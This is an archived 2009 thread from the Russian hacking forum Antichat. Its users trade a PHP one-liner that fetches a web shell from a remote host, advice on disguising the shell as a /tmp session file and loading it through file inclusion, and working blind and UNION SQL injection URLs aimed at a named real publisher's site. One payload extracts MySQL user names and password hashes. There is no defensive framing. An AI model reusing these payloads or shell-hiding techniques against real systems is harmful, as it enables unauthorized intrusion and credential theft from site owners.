ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
13.08.2009, 05:23
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
<?php copy('http://site.gov/shell.txt', 'shell.php');?>
|
|
|
13.08.2009, 08:44
|
|
Познающий
Регистрация: 10.03.2009
Сообщений: 54
Провел на форуме:
110312
Репутация:
50
|
|
А в какой каталог он скопирует файл? Может надо полный путь указать?
|
|
|
|
13.08.2009, 09:03
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802
Репутация:
298
|
|
скопирует в текущий каталог
если хотите в другое место, можно использовать абсолютный путь который начинается с "/"
ну или относительный "../../dir1/shell"
|
|
|
|
13.08.2009, 09:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
Проще тогда скопировать в /tmp/sess_26ac3fa833f07595698de0e73b8fa113.
Есть несколько плюсов:
1) 99% есть права на запись в диру
2) меньше палева, файл маскируется под сессию, и сидит там молча. =)
Потом инклудишь его index.php?page=/tmp/sess_26ac3fa833f07595698de0e73b8fa113
а потом уже перезаливаешь нормальный куда тебе нравится.
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|
|
13.08.2009, 13:57
|
|
Новичок
Регистрация: 13.08.2009
Сообщений: 2
Провел на форуме:
2194
Репутация:
0
|
|
http://www.inderscience.com/browse/index.php?journalID=114'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 30
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 38
Query Error:
SELECT coverImage FROM comanche.journalsMetadata WHERE sectionID=114\'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
что можно сделать? надеюсь я не ошибся темой)  |
|
|
|
13.08.2009, 14:25
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Сообщение от fast_start
http://www.inderscience.com/browse/index.php?journalID=114'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 30
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 38
Query Error:
SELECT coverImage FROM comanche.journalsMetadata WHERE sectionID=114\'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
что можно сделать? надеюсь я не ошибся темой) Крутить как слепую...
Например http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))>=100,1,0)-- выдает ошибку, значит наш ascii символ меньше...
пробуем http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))>=50,1,0)-- ошибки нет, значит символ больше, http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))>=52,1,0)-- максимальное значение на котором не выдает ошибку, проверяем http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))=52,1,0)-- ошибки нет, верно.
Т.е. первый ascii символ равен 52, значит версия мускуля 4-я.
Подробнее https://forum.antichat.ru/showpost.php?p=407227&postcount=3
|
|
|
|
13.08.2009, 17:16
|
|
Новичок
Регистрация: 27.07.2009
Сообщений: 13
Провел на форуме:
63551
Репутация:
13
|
|
Сообщение от nemaniak
Крутить как слепую...
Например http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))>=100,1,0)-- выдает ошибку, значит наш ascii символ меньше...
пробуем http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))>=50,1,0)-- ошибки нет, значит символ больше, http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))>=52,1,0)-- максимальное значение на котором не выдает ошибку, проверяем http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))=52,1,0)-- ошибки нет, верно.
Т.е. первый ascii символ равен 52, значит версия мускуля 4-я.
Подробнее https://forum.antichat.ru/showpost.php?p=407227&postcount=3
К чему такие громоздкие конструкции?
Код:
http://www.inderscience.com/browse/index.php?journalID=114+and+substring(version(),1,1)=4/*
Этого достаточно...
|
|
|
|
13.08.2009, 23:04
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Сообщение от fraIzer
К чему такие громоздкие конструкции?
Код:
http://www.inderscience.com/browse/index.php?journalID=114+and+substring(version(),1,1)=4/*
Этого достаточно... достаточно для определения версии не более, а буквы ты тоже будешь с числами сравнивать? а вот ascii код можно...
|
|
|
|
14.08.2009, 16:11
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Сообщение от fast_start
http://www.inderscience.com/browse/index.php?journalID=114'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 30
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 38
Query Error:
SELECT coverImage FROM comanche.journalsMetadata WHERE sectionID=114\'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
что можно сделать? надеюсь я не ошибся темой)
Код:
http://www.inderscience.com/browse/book.php?journalID=1001&year=2005&action=chapter&chapNum=23+union+select+1,2,3,unhex(hex(concat(file_priv,0x3a,user,0x3a,password))),5,unhex(hex(concat(version(),0x3a,user(),0x3a,database()))),7+from+mysql.user--
nemaniak, fraIzer не стоит торопиться с выводами.
|
|
|
|
15.08.2009, 18:47
|
|
Новичок
Регистрация: 27.07.2009
Сообщений: 13
Провел на форуме:
63551
Репутация:
13
|
|
Сообщение от z00MAN
Код:
http://www.inderscience.com/browse/book.php?journalID=1001&year=2005&action=chapter&chapNum=23+union+select+1,2,3,unhex(hex(concat(file_priv,0x3a,user,0x3a,password))),5,unhex(hex(concat(version(),0x3a,user(),0x3a,database()))),7+from+mysql.user--
nemaniak, fraIzer не стоит торопиться с выводами. Речь шла о конкретной скуле!!! Ты же показываешь совершенно другую!!!
Сообщение от nemaniak
достаточно для определения версии не более, а буквы ты тоже будешь с числами сравнивать? а вот ascii код можно...
Опять же на протяжении всего поста ты показывал ему как узнать версию, я и подмитил, что не к чему использовать такие громоздкие конструкции при определении версии(это не оправдывает себя), вот когда названия таблиц и столбцов подбирать начнешь, тогда да, но это совершенно другой вопрос, так или иначе то, что ты ему объяснил, это как вилами по воде, надеюсь понимаешь о чём я.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид